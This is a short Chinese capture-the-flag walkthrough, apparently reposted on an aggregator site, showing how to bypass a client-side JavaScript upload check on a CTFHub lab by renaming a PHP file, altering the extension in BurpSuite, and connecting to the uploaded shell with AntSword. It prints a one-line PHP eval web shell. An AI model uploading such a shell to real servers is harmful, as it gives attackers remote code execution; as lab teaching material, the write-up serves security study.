当前位置: 代码迷 >> 综合 >> CTFHub-前端验证上传-wp
  详细解决方案

CTFHub-前端验证上传-wp

热度:76   发布时间:2023-11-15 10:02:54.0

JS前端验证文件上传

  • 使用一句话木马

    <?php @eval($_POST['a']); ?>
    

    并保存为.php文件

  • 尝试上传

在这里插入图片描述

? 发现 .txt .php 文件都无法正常上传,只能上传 “.jpg" ".jpeg” “*.png” 文件。于是将 123.php 改为 123.jpg ,正常上传

  • 由于JS验证属于前端验证,我们可以通过BurpSuite拦截请求并修改文件后缀

在这里插入图片描述

在这里插入图片描述

? forward放包

  • 上传成功并回显相对路径

在这里插入图片描述

  • 复制路径并访问,使用HackBar进行POST传参验证木马可行性
    在这里插入图片描述

  • 执行成功

在这里插入图片描述

  • 使用蚁剑工具对木马进行连接

在这里插入图片描述

  • 连接成功

在这里插入图片描述

  • 拿下flag

在这里插入图片描述